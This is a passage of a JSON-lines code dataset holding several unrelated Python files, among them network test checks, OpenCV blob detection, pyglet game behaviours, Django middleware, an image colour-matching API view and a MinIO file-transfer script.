result.append(lav.checkPortChannel(host,'hotstandby',lagin))\n result.append(lav.checkLacpInternal(host,'hotstandby'))\n time.sleep(1)\n print('#' * 3 + ' check BCM Port state ' + '#' * 3) \n result.append(lav.checkBcmPort(host,'hotstandby'))\n changeMaxMember(child,8)\n time.sleep(5)\n print('#' * 3 + ' check lacp MaxMember 8 ' + '#' * 3) \n result.append(lav.checkPortChannel(host,'lacp',lagin))\n result.append(lav.checkLacpInternal(host,'passive'))\n time.sleep(1) \n result.append(lav.checkBcmPort(host,'normal'))\n 
time.sleep(1)\n removeLacp(host,lagin) \n print(result) \n return result.count('Ok')\n\n","repo_name":"jaehun-jang/Pytest","sub_path":"lag/lagConf.py","file_name":"lagConf.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24714494512","text":"import json\nfrom unique.mockdata import MockData\nimport os\n\nmocker = MockData()\nDATA_PATH = os.path.abspath(\".\") + \"\\data\\data.json\"\n\n\nclass DataType:\n NUM = \"num\"\n ARRAY = \"array\"\n PHONE = \"phone\"\n EMAIL = \"email\"\n\n\n# 设置数字唯一值并返回,设置phone 或 email\ndef setValue(varName, dataType=DataType.NUM, value=1, path=DATA_PATH):\n '''dataType: num、array'''\n with open(path, \"r\") as f:\n data = json.load(f)\n if varName in data.keys():\n if dataType == \"num\":\n data[varName] += value\n elif dataType == \"array\":\n data[varName].append(value)\n else:\n raise NameError(\"The '{}'dataType is not existed\".format(dataType))\n else:\n if dataType == \"num\":\n data[varName] = 1\n elif dataType == \"array\":\n data[varName] = [value]\n else:\n raise NameError(\"The '{}'dataType is not existed\".format(dataType))\n\n with open(path, \"w\") as write:\n json.dump(data, write, indent=4)\n\n return data[varName]\n\n\n# 取数字,or 取phone、email的唯一值\ndef getValue(varName, dataType=DataType.NUM, path=DATA_PATH):\n '''dataType: num、phone、email'''\n with open(path, \"r\") as f:\n data = json.load(f)\n if dataType == \"num\":\n return data[varName]\n elif dataType == \"phone\":\n try:\n phones = data[varName]\n except KeyError as e:\n phones = []\n phone = mocker.getPhone()\n while phone in phones:\n phone = mocker.getPhone()\n return setValue(varName, \"array\", phone)\n elif dataType == \"email\":\n try:\n emails = data[varName]\n except:\n emails = []\n email = mocker.getEmailAddr()\n while email in emails:\n email = mocker.getEmailAddr()\n return setValue(varName, \"array\", email)\n else:\n raise NameError(\"The '{}'dataType is not existed\".format(dataType))\n\n\nif __name__ == '__main__':\n setValue(\"test\")\n","repo_name":"jing17/qatools","sub_path":"unique/uniqueValue.py","file_name":"uniqueValue.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31136700122","text":"import cv2\r\nimport numpy as np\r\nimport imutils\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# def disp_frame(name, src):\r\n# # function to display frames so they fit my laptop screen\r\n# re_frame = cv2.resize(src, (1360, 780)) # Resize image to laptop dimensions\r\n# cv2.imshow(name, re_frame)\r\n# cv2.waitKey(0)\r\n\r\n\r\ndef list_pixels(mask):\r\n pixels = list()\r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if np.all(mask[i, j]):\r\n pass\r\n else:\r\n pixels.append([i, j]) # else append to PIO list\r\n return pixels\r\n\r\n\r\n# def gen_hist(frame, pixels):\r\n# frame_grey = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n# # init contour mask for locate func here to reduce total loop counts\r\n# mask = np.zeros((frame.shape[0], frame.shape[1]), np.uint8)\r\n# intents = list()\r\n# for i in range(len(pixels)):\r\n# ref = pixels[i]\r\n# intent = frame_grey[ref[0], ref[1]]\r\n# intents.append(intent)\r\n# if intent > 245: # set pixel intensity sensitivity for mask here\r\n# mask[ref[0], ref[1]] = 1\r\n# frame_binary = cv2.bitwise_and(frame, frame, mask=mask) # binop w mask to create binary frame for locate func\r\n# # plt.hist(intents, 
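# ---- Editor's aside (hedged sketch; not part of the surrounding records) ----
# setValue() above rewrites data.json in place; if the process dies mid-write
# the file is truncated. Writing to a temp file and swapping it in with
# os.replace keeps the last good copy (it still does not serialize two
# concurrent writers):
import json, os, tempfile

def atomic_dump(data, path):
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or '.')
    with os.fdopen(fd, 'w') as f:
        json.dump(data, f, indent=4)
    os.replace(tmp, path)   # atomic rename on POSIX and Windows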
255)\r\n# # plt.show()\r\n# return intents, frame_binary\r\n\r\n\r\ndef rect_ratio(contour, frame_binary):\r\n x, y, w, h = cv2.boundingRect(contour)\r\n bubble_pixels = 0\r\n for i in range(w):\r\n for j in range(h):\r\n if np.all(frame_binary[y + j, x + i][0]):\r\n bubble_pixels += 1\r\n ratio = bubble_pixels/(w * h)\r\n return ratio\r\n\r\n\r\ndef locate(frame, pixels):\r\n frame_grey = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n # init contour mask for locate func here to reduce total loop counts\r\n mask = np.zeros((frame.shape[0], frame.shape[1]), np.uint8)\r\n intents = list()\r\n for i in range(len(pixels)):\r\n ref = pixels[i]\r\n intent = frame_grey[ref[0], ref[1]]\r\n intents.append(intent)\r\n if intent > 245: # set pixel intensity sensitivity for mask here\r\n mask[ref[0], ref[1]] = 1\r\n frame_binary = cv2.bitwise_and(frame, frame, mask=mask) # binop w mask to create binary frame for locate func\r\n # plt.hist(intents, 255)\r\n # plt.show()\r\n\r\n #################################################\r\n # dont really understand eveything above... go over it to make sure it is actually needed\r\n # look into moving creating a hist into extract\r\n #################################################\r\n\r\n frame_final = frame.copy()\r\n grey_bin_frame = cv2.cvtColor(frame_binary, cv2.COLOR_BGR2GRAY)\r\n\r\n # find contours in the edge map\r\n contours = cv2.findContours(grey_bin_frame, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n contours = contours[0] if imutils.is_cv2() else contours[1]\r\n\r\n centres = list()\r\n for i in range(len(contours)):\r\n if cv2.contourArea(contours[i]) > 15: # set contour area condition\r\n rect = cv2.minAreaRect(contours[i])\r\n box = cv2.boxPoints(rect)\r\n box = np.int0(box)\r\n rect_width = rect[1][0]\r\n rect_height = rect[1][1]\r\n rect_aspect = rect_height/rect_width\r\n if 0.25 < rect_aspect < 4:\r\n if len(contours[i]) > 5:\r\n ratio = rect_ratio(contours[i], frame_binary)\r\n if ratio > 0.35:\r\n cv2.drawContours(frame_final, [box], 0, (0, 0, 255), 2) # draw min area rect red\r\n centres.append(rect[0])\r\n\r\n return centres, frame_final\r\n\r\n\r\n\r\n","repo_name":"hdthumb/lake_analysis","sub_path":"find_bubbles_lk.py","file_name":"find_bubbles_lk.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8395916172","text":"import time\r\n#defining a decorator\r\ndef calltime(func):\r\n def inner(*args):\r\n st=time.time()\r\n print(\"the start time is\",st)\r\n func(*args)\r\n et=time.time()\r\n print(\"The end time is\",et)\r\n d=et - st\r\n print(\"The time taken is\",d)\r\n minutes,sec=divmod(d,60)\r\n print(\"Minutes : \",minutes,\"\\nSeconds : \",sec)\r\n return inner\r\n#defining a generator\r\ndef Fibs():\r\n a,b=0,1\r\n while(True):\r\n yield a\r\n c=a+b\r\n a=b\r\n b=c\r\n #a,b=b,a+b\r\nn=int(input(\"Enter the value of n: \"))\r\n\r\n\r\n@calltime\r\ndef my(n):\r\n fibs=Fibs()\r\n for f in range(n):\r\n print(next(fibs))\r\n\r\n#calling my function\r\nmy(n)","repo_name":"Ashish-Garg524/oops_practical","sub_path":"program10.py","file_name":"program10.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8818512486","text":"from random import randint\nimport random\nimport math\nimport utils\nimport pyglet\nimport resources as res\nimport constants as CONSTS\n\n\ndef enter(self):\n while(True):\n if self.x < self.min_x:\n self.x += 
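# ---- Editor's aside (hedged worked example; not part of the surrounding records) ----
# The infinite Fibs() generator above is consumed with repeated next() calls;
# itertools.islice expresses "take the first n values" directly:
from itertools import islice

def fibs():
    a, b = 0, 1
    while True:
        yield a
        a, b = b, a + b

assert list(islice(fibs(), 7)) == [0, 1, 1, 2, 3, 5, 8]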
5\n elif self.x >= self.max_x:\n self.x -= 5\n if self.y < self.min_y:\n self.y += 5\n elif self.y > self.max_y:\n self.y -= 5\n\n if not self.is_outside:\n self.nonactive = False\n self.show_on_radar = True\n yield True\n else:\n yield False\n\n\ndef dying(self):\n self.scale = 1\n while(True):\n # if positional death (because of bullets, fade)\n if self._death_vx:\n self.x += self._death_vx\n self.y += self._death_vy\n self.scale *= 0.999\n if self.scale <= 0.3:\n self.remove = True\n # else if non-positional death (i.e., line enemy, out of bounds),\n # just remove\n else:\n self.remove = True\n yield 0\n\n\ndef exits(self):\n self._exits = True\n while(True):\n yield 0\n\n\ndef repulse(self, repulse_pos):\n x, y = repulse_pos\n repulse_theta = math.atan2(\n self.y - y, self.x - x)\n for i in xrange(5):\n self.vel_x = math.cos(repulse_theta) * 500\n self.vel_y = math.sin(repulse_theta) * 500\n yield 0\n while(True):\n\n yield 0\n\n\ndef pulse(self):\n while(True):\n self.scale = 0.95 + randint(0, 40) / 100.0\n yield 0\n\n\ndef delay(self, delay_time=0, alpha_time=50):\n \"\"\"\n Function that delays 'Enemy Spawn'\n Useful for delayed spawning ofc :P\n\n Keyword arguments:\n delay_time -- time when enemy should be active\n alpha_time -- time when enemy should appear\n\n An enemy can appear but still be inactive (alpha_time)\n \"\"\"\n\n first_x, first_y = self.x, self.y\n\n delay_time = int(delay_time)\n alpha_time = float(alpha_time)\n\n max_scale = 5\n\n self.opacity = 0\n self.scale = max_scale\n self.show_on_radar = False\n\n for i in xrange(delay_time):\n self._des_vy = 0\n self._des_vx = 0\n self.vel_x = 0\n self.vel_y = 0\n self.collidable = False\n yield 0\n\n i = 1\n d_i = 0\n d_i_interval = 1 / alpha_time\n\n music = res.spawn\n music.play()\n\n while(True):\n last_scale = self.scale\n if i <= alpha_time:\n self.show_on_radar = True\n self._des_vy = 0\n self._des_vx = 0\n self.vel_x = 0\n self.vel_y = 0\n self.collidable = False\n self.scale = max(1, max_scale - (i / alpha_time) * (max_scale - 1))\n self.opacity = min(255, (i / alpha_time) * 255)\n else:\n self.collidable = True\n i += 1\n yield 0\n\n\ndef rotate(self, angle=90):\n while(True):\n self.rotation = angle\n yield 0\n\n\ndef attract(self):\n self.attract = True\n while(True):\n yield 0\n\n\ndef black_hole(self):\n self.trackable = False\n self._blackhole_sep_v = 100.0\n self._black_hole = pyglet.sprite.Sprite(\n img=res.black_field, x=self.x, y=self.y, batch=self.batch)\n\n while(True):\n self._black_hole.x = self.x\n self._black_hole.y = self.y\n yield 0\n\n\ndef black_hole_cb(self):\n self._black_hole.delete()\n\n\ndef spin(self, speed=0.1):\n while(True):\n self.rotation += speed\n yield 0\n\n\ndef bounce(self, speed=3):\n r = -randint(0, 360) * math.pi / 180\n self.dir_x = math.cos(r)\n self.dir_y = math.sin(r)\n while(True):\n if self.y <= self.min_y or self.y >= self.max_y:\n self.dir_y = -self.dir_y\n elif self.x <= self.min_x or self.x >= self.max_x:\n self.dir_x = -self.dir_x\n\n self.vel_x = self.dir_x * speed\n self.vel_y = self.dir_y * speed\n yield 0\n\n\ndef move_square(self):\n f = 30\n speed = 1\n while(True):\n for i in xrange(f):\n self.vel_x += speed\n yield 0\n for i in xrange(f):\n self.vel_y -= speed\n yield 0\n for i in xrange(f):\n self.vel_x -= speed\n yield 0\n for i in xrange(f):\n self.vel_y += speed\n yield 0\n\n\ndef follow_player(self, speed=3):\n speed = speed\n while(True):\n if not self.track.dead:\n vx, vy = utils.normalize(\n self.track.x - self.x, self.track.y - self.y)\n vx *= 
speed\n vy *= speed\n self._des_vx = vx\n self._des_vy = vy\n yield 0\n\n\ndef rotate_to_player(self):\n i = 0\n amplitude = 5\n speed = 2\n while(True):\n i += amplitude\n vx, vy = utils.normalize(self.track.x - self.x, self.track.y - self.y)\n self._des_vy = amplitude * math.cos(i * math.pi / 180) + vy * speed\n self._des_vx = amplitude * math.sin(i * math.pi / 180) + vx * speed\n yield 0\n\n\ndef flank(self, horizontal=True, speed=5):\n self.separate = False\n if horizontal:\n while(True):\n mod = self.image.width / 2\n self.vel_x += speed\n if self.x >= CONSTS.game_width:\n self.x = CONSTS.game_width - mod - 5\n speed *= -1\n elif self.x <= 0:\n self.x = mod\n speed *= -1\n yield 0\n else:\n while(True):\n mod = self.image.height / 2\n self.vel_y += speed\n if self.y >= CONSTS.game_height:\n self.y = CONSTS.game_height - mod - 5\n speed *= -1\n elif self.y <= 0:\n self.y = mod\n speed *= -1\n yield 0\n\n\ndef zip(self, speed=20):\n x_active = False\n\n friction = 0.98\n iter_i = 0\n\n direction = pyglet.sprite.Sprite(\n x=self.x, y=self.y, img=res.squeezer_arrow, batch=self.layer)\n while(True):\n if direction:\n if self.dead:\n direction.delete()\n direction = False\n else:\n iter_i -= 1\n\n if not x_active:\n direction.rotation = 0 if self.track.x > self.x else 180\n else:\n direction.rotation = 270 if self.track.y > self.y else 90\n\n direction.x = self.x\n direction.y = self.y\n if iter_i <= 60:\n direction.opacity -= 10\n\n if iter_i <= 0:\n direction.opacity = 0\n iter_i = 240\n x_active = not x_active\n self.vel_x = self.vel_y = self._des_vx = self._des_vy = 0\n vx = speed if self.track.x > self.x else -speed\n vy = speed if self.track.y > self.y else -speed\n\n if x_active:\n vx *= friction\n self._des_vx = vx\n else:\n vy *= friction\n self._des_vy = vy\n yield 0\n\n\ndef evade(self):\n speed = 50\n while(True):\n aneighbors = 0\n vx = vy = 0\n for other in self.evade_list:\n aneighbors += 1\n\n vx += (other.x) - self.x\n vy += (other.y) - self.y\n\n vx *= speed\n vy *= speed\n\n vx /= self._aneighbors\n vy /= self._aneighbors\n vx, vy = utils.normalize(vx, vy)\n vx *= -5\n vy *= -5\n\n self.vel_x += vx\n self.vel_y += vy\n yield 0\n\n\ndef flee(self):\n speed = 0.5\n while(True):\n vx, vy = utils.normalize(self.x - self.track.x, self.y - self.track.y)\n vx *= speed\n vy *= speed\n self._des_vx += vx\n self._des_vy += vy\n yield 0\n\n\ndef link_sensor(self, x, y,):\n \"\"\"\n Callback when link sensor is collided to\n \"\"\"\n self.link_enemy.link_collide(x, y)\n\n\ndef split(self):\n while(True):\n self.split = True\n yield 0\n\n\ndef link(self, pair=None, sensors=None):\n\n self.trackable = False\n\n if not pair == None:\n self.pair = pair\n init_dists = []\n # Get the initial distances for the sensors (radial movement)\n for sensor in sensors:\n init_dists.append(sensor.x - pair.x)\n sensor.link_enemy = self\n init_dist = self.x - pair.x\n\n \"\"\"\n Kill the whole Line when collided with sensor\n \"\"\"\n def link_collide(x, y):\n if self.dead == False:\n self.dead = True\n pair.dead = True\n self.shot(x, y)\n pair.shot(x, y)\n for sensor in sensors:\n sensor.dead = True\n\n self.link_collide = link_collide\n while(True):\n if pair == None:\n self.rotation -= 1\n else:\n self.y = pair.y + init_dist * \\\n math.sin(-pair.rotation * math.pi / 180)\n self.x = pair.x + init_dist * \\\n math.cos(-pair.rotation * math.pi / 180)\n\n for i in xrange(len(sensors)):\n if not sensors[i].dead:\n sensors[i].y = pair.y + init_dists[i] * \\\n math.sin(-pair.rotation * math.pi / 180)\n 
sensors[i].x = pair.x + init_dists[i] * \\\n math.cos(-pair.rotation * math.pi / 180)\n\n self.rotation = pair.rotation - 180\n self.debug_vertex_list.append(self.layer.add(2, pyglet.gl.GL_LINES,\n None,\n ('v2f', (\n self.x, self.y, pair.x, pair.y)),\n ('c4B', (255,\n 0, 0, 255) * 2)\n ))\n yield 0\n\n\ndef shoot_circle(self, timer=60):\n from game.objects import Bullet\n timer_i = 10\n while(True):\n timer_i -= 1\n if timer_i <= 0:\n timer_i = timer\n for i in range(0, 360, 15):\n bullet = Bullet(behaviours=[[by_angle, i]], x=self.x, y=self.y, speed=2,\n img=res.fire_particle, batch=self.batch, on_bounds_kill=True)\n self.bullets.append(bullet)\n yield 0\n\n\ndef shoot_fire(self, angle=90, mod_dist=5, timer=40):\n from game.objects import Bullet\n\n timer_i = timer\n mod_dist = mod_dist\n a_i = angle\n mod = True\n\n while(True):\n timer_i -= 1\n if timer_i <= 0:\n timer_i = timer\n\n a_i += mod_dist\n\n bullet = Bullet(behaviours=[[by_angle, a_i]], x=self.x, y=self.y, speed=2,\n img=res.fire_particle, batch=self.batch, on_bounds_kill=True)\n self.bullets.append(bullet)\n\n yield 0\n\n\ndef circle_detect(self):\n\n background = pyglet.graphics.OrderedGroup(0)\n foreground = pyglet.graphics.OrderedGroup(1)\n detect = pyglet.sprite.Sprite(\n x=0, y=0, img=res.circle_detect, batch=self.layer, group=background)\n detect_text = pyglet.sprite.Sprite(\n x=0, y=0, img=res.circle_detect_text, batch=self.layer, group=foreground)\n while(True):\n if self.dead:\n detect.opacity = 0\n detect.delete()\n detect_text.delete()\n else:\n detect.x = self.x\n detect.y = self.y\n detect.rotation += 5\n detect_text.x = self.x\n detect_text.y = self.y\n yield 0\n\n\"\"\"\nBullet Behaviours\n\"\"\"\n\n\ndef spiral(self, i):\n wait = 60\n while(True):\n wait -= 1\n if wait < 0:\n i += 0.4\n r = i * -math.pi / 180\n self.vel_x = math.cos(r) * self.speed\n self.vel_y = -2 # math.sin(r) * self.speed\n\n yield 0\n\n\ndef by_angle(self, r, speed=5):\n self.rotation = r\n r *= -math.pi / 180\n dir_x = math.cos(r) * speed\n dir_y = math.sin(r) * speed\n self.vel_x = dir_x\n self.vel_y = dir_y\n while(True):\n yield 0\n\n\ndef by_sin(self, r):\n speed = 2\n amp = randint(20, 50)\n\n a = 0\n ar = r * -math.pi / 180\n dir_x, dir_y = math.cos(ar) * speed, math.sin(ar) * speed\n start_x, start_y = self.x, self.y\n\n while(True):\n if r == 0 or r == 180:\n self._des_vx += dir_x / 3.0\n self._des_vy = (math.sin(a) * amp + start_y) - self.y\n else:\n self._des_vx = (math.sin(a) * amp + start_x) - self.x\n self._des_vy += dir_y / 3.0\n a += 5 * math.pi / 180\n yield 0\n\n\ndef chase(self):\n speed = 5\n while(True):\n if not self.track.dead:\n vx, vy = utils.normalize(\n self.track.x - self.x, self.track.y - self.y)\n theta = math.atan2(\n self.track.y - self.y, self.track.x - self.x) * 180 / math.pi\n vx = 5 * (90 - abs(theta)) / 90\n if theta < 0:\n vy = -speed + abs(vx)\n else:\n vy = speed - abs(vx)\n self.x += vx\n self.y += vy\n\n self.vel_x = utils.trunc(self.vel_x + vx * speed, 8)\n self.vel_y = utils.trunc(self.vel_y + vy * speed, 8)\n yield 0\n\n\ndef penrose(self):\n r = 0\n while(True):\n r += 5\n r_pi = r * -math.pi / 180\n k = 6 / float(5)\n self.x = math.cos(k * r_pi) * math.sin(r_pi) * 100 + self.first_x\n self.y = math.sin(k * r_pi) * math.sin(r_pi) * 100 + self.first_y\n yield 
0\n","repo_name":"Secretmapper/Merc-01","sub_path":"game/behaviours.py","file_name":"behaviours.py","file_ext":"py","file_size_in_byte":13545,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"43010731262","text":"from __future__ import print_function\n\nimport logging\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\n\nfrom companies.models import Company, CompanyUser, NoLivePlanException\nfrom revenues.models import RevenuePlan\n\nlogger = logging.getLogger('icmo.%s' % __name__)\n\n\nclass AddCompanyPlanMiddleware(object):\n \"\"\"\n Add the company and plan to the request if they are in the\n view kwargs. Works with both the web and rest interfaces.\n \"\"\"\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n if not request.user.is_authenticated():\n return None\n request.selected_company = None\n request.selected_plan = None\n company_slug = None\n plan_slug = None\n for key, val in view_kwargs.items():\n if key == 'company_slug' or key.endswith('company__slug'):\n company_slug = val\n elif key == 'plan_slug' or key.endswith('revenue_plan__slug'):\n plan_slug = val\n\n if company_slug:\n try:\n request.selected_company = Company.objects.get(slug=company_slug)\n except Company.DoesNotExist:\n return HttpResponseRedirect(reverse('companies'))\n\n if plan_slug:\n try:\n request.selected_plan = RevenuePlan.objects.get(\n company=request.selected_company, slug=plan_slug)\n except RevenuePlan.DoesNotExist:\n return HttpResponseRedirect(reverse('revenue_plans', kwargs=dict(\n company_slug=request.selected_company.slug)))\n # Save the selected company to the user\n if request.selected_plan.pk != request.user.last_revenue_plan_id:\n request.user.last_revenue_plan_id = request.selected_plan.id\n request.user.save()\n elif request.user.is_authenticated() and request.user.owned_companies.count() == 1:\n request.selected_company = request.user.owned_companies.first()\n return None\n\n\nclass AddCompanyUserMiddleware(object):\n \"\"\"\n Add the company_user to the request and bounce if the user does\n not have access to this company. 
Between this and the BouncerMiddleware\n    below all company, revenue_plan, and segment access restriction is\n    implemented for both the web and rest interfaces.\n\n    Note: Must come after AddCompanyPlanMiddleware\n    \"\"\"\n\n    def process_view(self, request, view_func, view_args, view_kwargs):\n        request.company_user = None\n        if request.user.is_authenticated() and request.selected_company:\n            try:\n                request.company_user = CompanyUser.objects.select_related().get(\n                    company=request.selected_company,\n                    user=request.user)\n            except ObjectDoesNotExist:\n                logger.debug(\n                    'User %s was blocked because no CompanyUser could be found for '\n                    'company `%s`' % (request.user, request.selected_company.slug))\n                return HttpResponseRedirect(reverse('permission_denied'))\n        return None\n\n\nclass PlanBouncerMiddleware(object):\n    \"\"\"\n    Check the selected_plan and any segment_slug for access\n\n    Note: Must come after AddCompanyPlanMiddleware\n    \"\"\"\n\n    def process_view(self, request, view_func, view_args, view_kwargs):\n        if request.company_user:\n            if request.selected_plan:\n                try:\n                    if request.selected_plan.slug not in \\\n                            request.company_user.permitted_revenue_plans_slugs:\n                        logger.debug(\n                            'User %s was blocked from accessing a plan other than the live plan'\n                            % request.user)\n                        return HttpResponseRedirect(reverse('permission_denied'))\n                except NoLivePlanException:\n                    logger.debug(\n                        'User %s was blocked because there is no active plan' % request.user)\n                    return HttpResponseRedirect(reverse('no_published_plan'))\n","repo_name":"hasanulhaquebanna/testing-gregg","sub_path":"icmo/apps/core/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} {"seq_id":"39155974713","text":"import urllib.parse\nfrom io import BytesIO\n\nimport PIL\nimport requests\nfrom django.conf import settings\nfrom rest_framework import permissions, status\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n\nclass MatchColour(APIView):\n    permission_classes = [permissions.IsAuthenticated]\n\n    def get(self, request: Request) -> Response:\n        errors = []\n\n        url = request.query_params.get(\"url\", None)\n        if url is not None:\n            parsed_url = urllib.parse.urlparse(url)\n            if parsed_url.scheme.lower() not in (\"http\", \"https\"):\n                # prevent file:// attacks etc\n                errors.append(\"Only http or https URLs are allowed\")\n        else:\n            url = \"\"  # for \"might be referenced before assignment\"\n            errors.append(\"Please specify a 'url' query parameter\")\n\n        space = request.query_params.get(\"colour_space\", settings.DEFAULT_COLOUR_SPACE).lower()\n        if space not in settings.COLOUR_MATCHERS or space not in settings.DEFAULT_MAX_DISTANCES:\n            errors.append(\"Invalid colour space\")\n        else:\n            max_distance_str = request.query_params.get(\"max_distance\", None)\n            if max_distance_str is None:\n                max_distance = settings.DEFAULT_MAX_DISTANCES[space]\n            else:\n                try:\n                    max_distance = float(max_distance_str)\n                except ValueError:\n                    max_distance = -1.0  # for \"might be referenced before assignment\"\n                    errors.append(\"Invalid max distance\")\n\n        summariser = request.query_params.get(\"summariser\", settings.DEFAULT_IMAGE_SUMMARISER).lower()\n        if summariser not in settings.IMAGE_SUMMARISERS:\n            errors.append(\"Invalid image summariser\")\n\n        if errors:\n            return Response({\"errors\": errors}, status=status.HTTP_400_BAD_REQUEST)\n\n        # This is potentially a big 
security hole, at the very least for reflected DDOSes.\n # Make sure this view's permissions are set to at least IsAuthenticated.\n try:\n r = requests.get(url)\n except requests.RequestException:\n return Response(\n {\"errors\": [\"Could not fetch the URL given, could not connect\"]},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n if not r.ok:\n return Response(\n {\"errors\": [f\"Could not fetch the URL given, status code was {r.status_code}\"]},\n status=status.HTTP_400_BAD_REQUEST,\n )\n image_file = BytesIO(r.content)\n\n try:\n image_colour = settings.IMAGE_SUMMARISERS[summariser].summarise(image_file)\n except PIL.UnidentifiedImageError:\n return Response({\"errors\": [\"Could not parse image\"]}, status=status.HTTP_400_BAD_REQUEST)\n\n nearest_colour, distance = settings.COLOUR_MATCHERS[space].nearest(image_colour)\n\n if distance > max_distance:\n return Response(\n {\"errors\": [f\"No colour found within {max_distance} units\"]}, status=status.HTTP_404_NOT_FOUND\n )\n\n return Response({\"colour\": nearest_colour, \"distance\": distance})\n","repo_name":"ojno/closest_colour","sub_path":"closest_colour/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70009261583","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom django.views.generic.base import TemplateView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('users/', include('users.urls')),\n path('project/', include('Project.urls')),\n path('seminar/', include('seminar.urls')),\n path('lab/', include('lab.urls')),\n path('search/', include('search.urls')),\n path('', TemplateView.as_view(template_name='home.html'), name='home'),\n]","repo_name":"Acciente717/AcademicDealerBackend","sub_path":"AcademicDealerBackend/AcademicDealerBackend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"35154072404","text":"from sys import stdin\nfrom collections import defaultdict\nfrom collections import Counter\nimport re\n\ninp = [i.strip() for i in stdin.readlines()]\ninp.sort()\nguards = defaultdict(list)\ni = 0\nwhile(i < len(inp)):\n if re.search('#(\\d+)', inp[i]):\n num = int(re.search('#(\\d+)', inp[i]).group()[1:])\n i += 1\n while(i < len(inp) and not re.search('#(\\d+)', inp[i])):\n guards[num] += list(range(int(inp[i].split(':')[1][:2]), int(inp[i+1].split(':')[1][:2])))\n i += 2\nmax = 0\noccurances = dict()\nfor i in guards.keys():\n counter = Counter(guards[i])\n occurances[i] = counter.most_common(1)[0]\n if occurances[i][1] > max:\n maxId, minute, max = i, occurances[i][0], occurances[i][1]\nprint(maxId*minute)","repo_name":"tterb/advent-of-code","sub_path":"2018/day4p2.py","file_name":"day4p2.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"70906556303","text":"#!/usr/bin/env/python\nimport os\nimport zipfile\nimport boto3\nfrom botocore.client import Config\n\n\n\n\nENDPOINT=os.environ.get(\"ENDPOINT\")\nMINIO_ACCESS_KEY=os.environ.get(\"MINIO_ACCESS_KEY\")\nMINIO_SECRET_KEY=os.environ.get(\"MINIO_SECRET_KEY\")\nBUCKET=os.environ.get(\"BUCKET\")\nFILEPATH=os.environ.get(\"FILEPATH\")\nFILENAME=os.environ.get(\"FILENAME\")\nID_TRAINING=os.environ.get(\"ID_TRAINING\")\n\n\ns3 = boto3.resource('s3',\n 
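# endpoint and credentials are read from the environment variables loaded above\n                    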
endpoint_url=ENDPOINT,\n                 aws_access_key_id=MINIO_ACCESS_KEY,\n\t\t    aws_secret_access_key=MINIO_SECRET_KEY,\n                 config=Config(signature_version='s3v4'),\n                 region_name='us-east-1')\n\n\ns3.Bucket(BUCKET).download_file(FILENAME, FILENAME)\n\npath, ext = os.path.splitext(FILENAME)\n\nif ext == \".zip\":\n\tarchivio = zipfile.ZipFile(FILENAME) \n\n\n\t# extract all the files\n\tarchivio.extractall() \n\n\t# close the archive\n\tarchivio.close()\n\n\tfor file in os.listdir(path):\n\t\t\n\t\ts3.Bucket(BUCKET).upload_file(path+\"/\"+file, ID_TRAINING+\"-\"+file )\nelse:\n\n\ts3.Bucket(BUCKET).upload_file(FILENAME, ID_TRAINING+\"-\"+FILENAME)\n\nprint (\"Downloaded the file and re-uploaded it with the training id in its name\")\n\n","repo_name":"FedericoGiuliana/Mimir-Engine","sub_path":"Dummy/estrazione.py","file_name":"estrazione.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} {"seq_id":"38219101595","text":"from Filter_Frame import *\nimport cv2\nimport numpy as np\n\n# Setup SimpleBlobDetector parameters. More details in https://www.learnopencv.com/blob-detection-using-opencv-python-c/\nparams = cv2.SimpleBlobDetector_Params()\ncap = cv2.VideoCapture('/home/dilan/Desktop/Final Year Project/Programming Testing/Filter Test/Videos/video1.mp4')\n\n# Change thresholds for intensity. Since the blobs are dark, the thresholds should be low\nparams.minThreshold = 0\nparams.maxThreshold = 125\n\n# Filter by Area. Need to find a better threshold calculating mechanism\nparams.filterByArea = True\nparams.minArea = 100 # Should be set according to a\n                   # ratio between the considered area and the actual expected object size\nparams.maxArea = np.pi*12*12\n\n\n# Filter by Circularity\nparams.filterByCircularity = True\nparams.minCircularity = 0.1\nparams.maxCircularity = 0.9\n\n# Filter by Convexity\nparams.filterByConvexity = True\nparams.minConvexity = 0.5\nparams.maxConvexity = 0.9\n\n# Filter by Inertia // lower values are better because when moving Inertia tends to become 0\nparams.filterByInertia = True\nparams.minInertiaRatio = 0.1\nparams.maxInertiaRatio = 0.9\n\n\n# Set up the detector with default parameters.\ndetector = 